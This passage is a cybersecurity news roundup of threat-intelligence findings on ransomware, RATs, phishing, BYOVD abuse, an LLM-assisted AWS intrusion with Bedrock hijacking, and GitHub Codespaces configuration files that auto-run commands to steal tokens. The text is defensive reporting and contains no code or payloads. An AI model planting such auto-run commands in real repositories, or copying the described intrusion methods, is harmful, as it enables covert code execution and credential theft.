Cybersecurity Alerts: Vulnerabilities in Codespaces, AsyncRAT Malware, BYOVD Abuse, AI Cloud Intrusions, and More!

APT36, a threat actor aligned with Pakistan, has expanded its operations beyond government targets to infiltrate India’s startup ecosystem. Using ISO files and malicious LNK shortcuts disguised as sensitive startup-related content, APT36 delivers Crimson RAT, enabling extensive surveillance, data theft, and system reconnaissance. The attack begins with a spear-phishing email containing an ISO image that, once executed, deploys a malicious shortcut file leading to the installation of Crimson RAT disguised as an executable named Excel. While this expansion signifies a shift in focus, the campaign remains aligned with Transparent Tribe’s historical interest in collecting intelligence related to the Indian government and defense sectors. This overlap suggests that individuals associated with startups may be targeted due to their proximity to government, law enforcement, or security operations, according to Acronis.

ShadowSyndicate, a threat activity cluster, has been linked to two additional SSH markers connecting numerous servers under the same cybercrime operator. These servers are utilized by various threat clusters associated with Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta for various malicious activities. Notably, the threat actor frequently transfers servers between SSH clusters. ShadowSyndicate is known to employ toolkits like Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel. Group-IB noted that the threat actor often reuses previously used infrastructure and rotates SSH keys across servers. Proper execution of this technique allows for the seamless transfer of infrastructure, mimicking legitimate server transitions.

CISA has updated 59 actively exploited vulnerability notices from 2025 to reflect their exploitation by ransomware groups. These include vulnerabilities in Microsoft (16 entries), Ivanti (6 entries), Fortinet (5 entries), Palo Alto Networks (3 entries), and Zimbra (3 entries). GreyNoise’s Glenn Thorpe advised organizations to reassess vulnerabilities labeled as ‘Known’ from ‘Unknown,’ especially if they have been deprioritized due to their non-association with ransomware attacks.

Polish authorities have apprehended a 60-year-old employee of the country’s defense ministry on suspicion of spying for a foreign intelligence agency. The individual, who worked in the Ministry of National Defense’s strategy and planning department, including on military modernization projects, is believed to have collaborated with Russian and Belarusian intelligence services. Additionally, Poland’s Central Bureau for Combating Cybercrime (CBZC) arrested a 20-year-old man for conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The suspect faces six charges and a potential five-year prison sentence.

Multiple attack vectors have been identified in GitHub Codespaces that enable remote code execution by merely opening a malicious repository or pull request. These vectors include: (1) .vscode/settings.json with PROMPT_COMMAND injection, (2) .devcontainer/devcontainer.json with postCreateCommand injection, and (3) .vscode/tasks.json with folderOpen auto-run tasks. By exploiting VS Code-integrated configuration files that Codespaces recognizes, threat actors can execute arbitrary commands, extract GitHub tokens and secrets, and leverage hidden APIs to access premium Copilot models. Despite Microsoft deeming this behavior intentional, security researchers have raised concerns about the potential risks.

The Lazarus Group, linked to North Korea, has been targeting the financial sector in the Nordic region through a campaign named Contagious Interview. This campaign deploys a stealer and downloads a tool named BeaverTail, which not only searches for cryptocurrency-related data on the victim’s machine but also serves as a remote access tool for further malicious activities. TRUESEC highlighted that BeaverTail can be used to automatically gather sensitive information while also providing a pathway for additional attacks.

SOCRadar’s analysis revealed that the pro-Russian hacktivist group NoName057(16) is utilizing a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites associated with Ukraine and Western political interests. With active Telegram channels boasting over 20,000 followers, the group presents these disruptive but non-destructive attacks as self-defense against Western aggression. By offering real-time evidence of successful disruptions, the group aims to counter sanctions and military aid announcements through retaliatory cyber attacks. The DDoSia Project recruits participants through propaganda, gamification, and cryptocurrency rewards, building a distributed attack force with minimal technical requirements but high operational sophistication, primarily targeting Ukraine, European allies, and NATO states across various sectors.

The Rublevka Team, a significant cybercriminal operation specializing in large-scale cryptocurrency theft since 2023, has generated over $10 million through affiliate-driven wallet draining campaigns. Acting as a ‘traffer team,’ Rublevka Team comprises a network of social engineering specialists directing victim traffic to malicious pages. Unlike traditional malware-based approaches, Rublevka Team employs custom JavaScript scripts via spoofed landing pages mimicking legitimate crypto services to trick victims into authorizing fraudulent transactions. Affiliates of Rublevka Team gain access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types, facilitating high-volume scams with minimal oversight. The group’s Telegram channel has amassed approximately 7,000 members to date.

Microsoft has issued an advisory urging customers to enhance the security of their infrastructure by migrating to Transport Layer Security (TLS) version 1.2 for Azure Blob Storage. The company plans to discontinue support for TLS versions 1.0 and 1.1 on February 3, 2026. This change will impact all existing and new blob storage accounts utilizing TLS 1.0 and 1.1 across all cloud environments. However, storage accounts already leveraging TLS 1.2 will not be affected by this transition.

A recent campaign has surfaced involving fake voicemail messages with bank-themed subdomains that redirect recipients to a deceptive “listen to your message” experience. This ploy leads to the deployment of Remotely RMM, a legitimate remote access software, which enrolls the victim’s system into an attacker-controlled environment, granting remote access and management capabilities. By leveraging social engineering tactics rather than exploits, threat actors persuade users to approve installation steps, ultimately enrolling devices into an environment controlled by the attacker.

SystemBC, a long-standing malware operation also known as Coroxy or DroxiDat, has infected over 10,000 IP addresses globally, including systems associated with sensitive government infrastructure in Burkina Faso and Vietnam. The highest concentration of infected IP addresses is observed in the U.S., followed by Germany, France, Singapore, and India. SystemBC is commonly used to proxy traffic through compromised systems, maintain persistent access to internal networks, or deploy additional malware. The associated infrastructure poses a sustained risk due to its early involvement in intrusion chains and its use by multiple threat actors. Vigilant monitoring is crucial as SystemBC activity often precedes ransomware deployment and other malicious activities.

A new spear-phishing campaign employing business-themed lures has been observed using Windows screensaver files (.SCR) to discreetly install legitimate remote monitoring and management (RMM) tools like SimpleHelp. By concealing the attack within trusted services, the delivery chain evades reputation-based defenses, complicating takedown and containment efforts. SCR files serve as reliable initial access vectors due to their executable nature and bypassing of traditional controls. Attackers exploit users’ tendency to download and run these files, triggering code execution while evading policies primarily targeted at EXE and MSI files.

Threat actors are leveraging a legitimate but revoked Guidance Software (EnCase) kernel driver in a bring your own vulnerable driver (BYOVD) attack to escalate privileges and circumvent security tools. In a recent incident, attackers compromised SonicWall SSL-VPN credentials to gain initial access to a network and deployed an EDR that exploited the EnCase driver (“EnPortv.sys”) to terminate security processes from kernel mode. Despite the attack being disrupted before ransomware deployment, it highlights a concerning trend of threat actors weaponizing signed, legitimate drivers to bypass endpoint security measures.

Security researchers have identified a coding error in the Nitrogen ransomware that leads to the encryption of files with an incorrect public key, rendering them irrecoverable. Victims without viable backups are unable to decrypt their ESXi encrypted servers, even if they pay the ransom. Coveware emphasized that paying the ransom will not aid these victims as the decryption key or tool will be ineffective.

An offensive cloud operation targeting an Amazon Web Services (AWS) environment achieved administrative privileges within eight minutes, utilizing large language models (LLMs) to automate reconnaissance, generate malicious code, and make real-time decisions. The threat actor gained initial access by exploiting credentials discovered in public Simple Storage Service (S3) buckets, rapidly escalated privileges through Lambda function code injection, traversed 19 unique AWS principals, utilized Amazon Bedrock for LLMjacking, and deployed GPU instances for model training. Despite the speed of the attack, Sysdig noted the utilization of LLMs to streamline malicious activities.

A phishing scheme has emerged, utilizing procurement and tender-themed phishing emails to distribute PDF attachments initiating a multi-stage attack chain. This scheme aims to steal users’ Dropbox credentials, which are then sent to a Telegram bot. After transmitting the data, the attack simulates a login process with a 5-second delay, displaying an “Invalid email or password” error message. By leveraging seemingly legitimate cloud infrastructure like Vercel Blob storage to host a PDF that redirects victims to a Dropbox impersonation page, the campaign successfully deceives users by leveraging the trust associated with Dropbox, ultimately harvesting credentials.

A critical security flaw (CVE-2025-64721, CVSS score: 9.9) has been disclosed in Sandboxie, enabling sandboxed processes to execute arbitrary code as SYSTEM, compromising the host system fully. The vulnerability stems from a service named “SboxSvc.exe,” operating with SYSTEM permissions as the intermediary between sandboxed processes and actual computer resources. The flaw has been rectified in version 1.16.7, emphasizing the importance of addressing such vulnerabilities to prevent potential exploitation.

Censys has identified 57 active AsyncRAT-associated hosts exposed on the public internet as of January 2026. AsyncRAT, introduced in 2019, facilitates unauthorized access and post-compromise control, making it a preferred tool for credential theft, lateral movement, and subsequent malicious activities. The majority of these assets are hosted on APIVERSA (13% of hosts), Contabo networks (11% combined), and AS-COLOCROSSING (5.5%), indicating a preference for low-cost, abuse-tolerant hosting over major cloud providers. The distinctive self-signed TLS certificate identifying the service as an ‘AsyncRAT Server’ enables scalable discovery of related infrastructure beyond sample-based detection.

Analysis of campaigns by Chinese hacking groups Violet Typhoon and Volt Typhoon unveiled common tactics such as zero-day exploits in edge devices, living-off-the-land (LotL) techniques, and Operational Relay Box (ORB)